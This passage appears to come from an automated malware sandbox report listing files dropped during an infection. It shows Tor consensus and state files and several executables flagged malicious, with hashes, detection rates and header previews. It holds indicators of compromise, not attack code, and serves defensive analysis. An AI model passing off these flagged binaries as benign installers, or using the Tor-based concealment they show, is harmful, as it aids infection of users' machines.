                                                                                                                                                                                                                                                                                                                                                                SHA-256:9E9E43A8B7FC3C252E908C287C790A0A7147A7BB3E8F4C939B9DEEDEF0EEE373
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23911CE38561D556151523ADC4E1C48BD13B8E6B5253C92221FCDD9D3C73F252819113067BB0D60C2DB205BDD221AB59716BFE821D0BB4B416B0B78517C0686D
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-05 10:00:00.fresh-until 2024-02-05 11:00:00.valid-until 2024-02-05 13:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15714)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):20835900
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.829744783074033
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:ZCiuZ/B1ZioTILtShuOkms54/0+0SvVnjT8uPlVMxedYwA1ZeVJOm0luh9KbdMA4:Z/3dHHO/MoAxWieN7wj1Sspeh+3nz+ms
                                                                                                                                                                                                                                                                                                                                                                MD5:0BFF9E06231B54AAE69A146879CAF990
                                                                                                                                                                                                                                                                                                                                                                SHA1:D3F066603453A965DD99C717EB5A5343DD98EE83
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1F304E70B17FA9BBD6BF939DBE4D5AE4EC96A50493E0C8B91F6CC8353341B052
                                                                                                                                                                                                                                                                                                                                                                SHA-512:EC6ADB9E6B117829ECF44C01444B5AC22F9511E6F01ED9E4216329190D4379AEB1423F4857ADC7DEE43CAEFD5C19F48F32C02CFDED69F06256CA80C3FBD1BA9A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:@last-listed 2024-02-05 11:12:40.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMkAP0uCEJ89XmD113C6jla21YZN1EpsGtSk5CZVRWgHkKCWd9DldMlk.0QiWLA4004LtNZzRCQhUHCkdw+Xstt/HqlR1gIxqyyGwYZGiSOr5beiL/kisAIXU.isSx2FfygO2ZiCTu1X0UP7Az3QzpCGKsyhBesaPZdTpKnN76D1azAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key SrajEQVTOVVdltYDXNVGBWtlT48OZ0alxU0/5YRf/xI.id ed25519 JkP4nl5gqv9QKA9wyA7uR80FI/4W2aQbxTxV/fPiif0.@last-listed 2024-02-05 11:12:40.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMtDc6t9rd2BDWFIV5wjpbweaoMXfuK7x8YwxcGldPxjmRDQYNhQJpCe.JXlcmnNef85Scq0qJjiI956JdM+6IWFs9mN989ynMGRcZrIv87ZbyoGUrKh7m6nW.nmdpURINkJlLZBdFkWpkX3FjBDqgRfR4PngyH65iH41JRwwjFNbDAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key nFGC+TQuOoshg3BgjaPahTHbYaN+9SJaAKaH37HE3Ww.id ed25519 OLp2JoPMyfZ8S683sjs0Jg9pKFzb/j9tBTZxNSsCk2A.@last-listed 2024-02-05 11:12:40.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAK5AAI9aG1axxhofMZJ2JRDGMI//h12/weI4OrbpSk/HeLPi+PFuY+jX.KJFjjgcEbS6c50+XPTVa5xn/+0HmE22gBQ8hRK1s88nOL

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4081
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.288738668097656
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cASzeUqhztJm/r57Qvid3lbXEwQ0qCc0fddXDT6QoHk2n:LzUqhzTm/r6w3lXy3Cdfdd5ck2n
                                                                                                                                                                                                                                                                                                                                                                MD5:F0428034CA3F03B3B460CDBC2D4C67A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:ECE772106FCB63F2B29088C7680ED99B9F365886
                                                                                                                                                                                                                                                                                                                                                                SHA-256:750DC180F54FC8C6CBE4D4B814B589676EC9D14F84010221C2E357EE46683C21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4467BA3137E79727DE49523D4A6EC54B7EB2ADC06CADAB5BCD0474F7B07BE2206B390951864461216758C99FAEFDD456F7B8F650FE3293C017A95E45671D6CC3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2024-02-05 12:19:18 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 2..CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 1225 2..CircuitBuildTimeBin 5825 2..CircuitBuildTimeBin 6275 2..CircuitBuildTimeBin 7575 1..CircuitBuildTimeBin 8225 1..CircuitBuildTimeBin 15975 1..Dormant 0..Guard in=default rsa_id=8C21ADDA21228BB4260C73FD5ED1687070EF53DE nickname=iusearchbtw sampled_on=2024-02-04T19:16:56 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=5C80CB557C96CAD80EF8EC6AB55865329DF74B1B nickname=Droutnutch sampled_on=2024-02-04T11:05:44 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-30T19:10:57 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=5.000000 pb_circ_attempts=10.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=6.000000 pb_collapsed_circuits=1.000000 pb_unusable_circuits=1.000000 pb_timeouts=3.000000..Guard in=default rsa_id=606ECD6

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-05 10:00:00.fresh-until 2024-02-05 11:00:00.valid-until 2024-02-05 13:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\572.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1998848
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9427880780763775
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:v1r2g+mLqqeaVjSeluJsslFHfjeKgHEaVjsKHzG:drz+OqjXeluJxlFHf6zHj
                                                                                                                                                                                                                                                                                                                                                                MD5:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                SHA1:50992F712B281DB70518E6D404084E26DCD98B98
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                                                                                                                                                                                                                                                                                                                                                                SHA-512:18A2FA6E9C97281328DE819126DCCB6CC8576E11EA11A8FABA629DA58E724040427C7D941CE0F935948195C30DA6D60A6873D7E3E9613EBA7DF42BDE1A3ABA1F
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..............~.......~.%.....~...}.....(.........y...~.......~.!.....~.&.....Rich............................PE..L...}N.d............................,........0....@..........................0.......v.......................................\..P....0..0...................................................hW...... W..@............0...............................text............................... ..`.rdata...5...0...6..................@..@.data...D....p..."...T..............@....fofufe.|............v..............@....tls.................x..............@....safaz....... ......................@....rsrc...0....0......................@..@........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\66E0.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):316928
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.416147082500045
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:3ek3WL2r0gBzjKRkQ3Z/Cwr1ofDtRYkM+:pmo0gJWbQsufD
                                                                                                                                                                                                                                                                                                                                                                MD5:00724C5DD4E5F9500CFF8E79EED0390E
                                                                                                                                                                                                                                                                                                                                                                SHA1:5648D5EDC0DA7F55EB17F8DEB95219BB9BC8AFF7
                                                                                                                                                                                                                                                                                                                                                                SHA-256:AEAAAEFD57983775F853F25AEBB7507A4AC6E143FD8E8F1C2A8A46AF15999D6D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:D7B56344CA6C7D4CC6F1CE96245612B3D4DCC4B643C4D8AD6204BE471A5C76ACED811C23630AD3CD5A7E41A33F4006AB6ABBDD6E2C64A15F3162FF591C30DF0C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L......c.................|...H.......$............@.................................k|..........................................d.... ..x...............................................................@............................................text....z.......|.................. ..`.rdata...\.......^..................@..@.data...d%.......R..................@....rsrc...x.... .......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\93B.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):431104
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.865829876036064
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:4phcsngKdHpPXECq6Xz4G/rmnHXekVB9YNeeA23YMd7pMFW54AXIEB93KWZMxEHL:4pasngwHpP5qa4G4eIWsyHd0XKBBXL
                                                                                                                                                                                                                                                                                                                                                                MD5:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                                                                                                                                                                                                                SHA1:5A7141B167056BF8F01C067EBE12ED4CCC608DC7
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E40C8E14E8CB8A0667026A35E6E281C7A8A02BDF7BC39B53CFE0605E29372888
                                                                                                                                                                                                                                                                                                                                                                SHA-512:430C8B43C2CBB937D2528FA79C754BE1A1B80C95C45C49DBA323E3FE6097A7505FC437DDAFAB54B21D00FBA9300B5FA36555535A6FA2EB656B5AA45CCF942E23
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..Y..Y..3..p..Y..[....[..Y..V....X..RichY..................PE..L......d..........................................@......................................@.........................................................................P...................................................8............................text............................... ..`.rdata... ..........................@..@.data... ....0......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4979200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.419395528077673
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:90oSiZ63YBmS9+rCgpvH8la0ZxRh+caGnj8HEQUhexTUT+1d/2/Tbt:0Ula0cGwXUheabt
                                                                                                                                                                                                                                                                                                                                                                MD5:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                                                                                                                                                                                                                                                                                                SHA1:D0189CBA430F5EEA07EFE1AB4F89ADF5AE2453DB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:50A46B3120DA828502EF0CABA15DEFBAD004A3ADB88E6EACF1F9604572E2D503
                                                                                                                                                                                                                                                                                                                                                                SHA-512:473DFA66A36FEED9B29A43245074141478327CE22BA7CCE512599379DCB783B4D665E2D65C5E9750B988C7ED8F6C3349A7A12D4B8B57C89840EEE6CA6E1A30CD
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^..................9..X.......9.......9...@.......................... N..................@....................<......`<..B...`A.......................<.tk............................<.....................Ll<.......<......................text...8`9......b9................. ..`.itext...;....9..<...f9............. ..`.data.........9.......9.............@....bss....`.....:..........................idata...B...`<..D...|:.............@....didata.......<.......:.............@....edata........<.......:.............@..@.tls....L.....<..........................rdata..].....<.......:.............@..@.reloc..tk....<..l....:.............@..B.rsrc........`A......<?.............@..@............. N.......K.............@..@................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\FE8B.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5911640
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9813751821902255
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:o4Z22tk7CUxDobkYG6sk/ixzpx5ItNoP/JKawK5Ms5bZxpMo:o4ZFUKbY69KJ57nJhwK5Vh5n
                                                                                                                                                                                                                                                                                                                                                                MD5:E88E0FE2BB602D639E5658C42F34AF2F
                                                                                                                                                                                                                                                                                                                                                                SHA1:0F5183B2A40169755EADE4FF45354E8FCC3CF74A
                                                                                                                                                                                                                                                                                                                                                                SHA-256:0BCF297F2808010CD7BD4180329C1F994DAAB75DD6FF543A5360ADB5EB5BB753
                                                                                                                                                                                                                                                                                                                                                                SHA-512:660167D07268CDE0B34D749E4E4C278494CFED3FBF68484AC5A0434E36F3A27EF95D31593976FAFCBC138DDE5B9B7F56879AC77BAE1F73EB3391A9162F5CE15C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...]..e................."...N......Hy............@.......................... ......^KZ...@.....................................d........z............Z.X.......`.....................................................?..............................text....!.......................... ..`.rdata..>....@......................@..@.data.......`......................@....vmp@3...7.. ...................... ..`.vmp@3......?.....................@....vmp@3..yW...@..zW................. ..`.reloc..`.............W.............@..@.rsrc....z.......|....W.............@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\FourthX.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2654720
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.545978188908966
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                                                                                                                                                                                                                                                                                                MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2123218
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9788749010606965
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:ChrF2z0X1W34qvuyXPHcqaGqW9gwLgMyu5noEiyIJAuw:ChFdFWINS/NF9gpMR5oEfF
                                                                                                                                                                                                                                                                                                                                                                MD5:28B72E7425D6D224C060D3CF439C668C
                                                                                                                                                                                                                                                                                                                                                                SHA1:A0A14C90E32E1FFD82558F044C351AD785E4DCD8
                                                                                                                                                                                                                                                                                                                                                                SHA-256:460BA492FBC3163B80BC40813D840E50FEB84166DB7A300392669AFD21132D98
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3E0696B4135F3702DA054B80D98A8485FB7F3002C4148A327BC790B0D33C62D442C01890CC047AF19A17A149C8C8EB84777C4FF313C95EC6AF64A8BF0B2D54B6
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................P............@..........................................P..(............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...(....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u4xydtm.g51.ps1

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
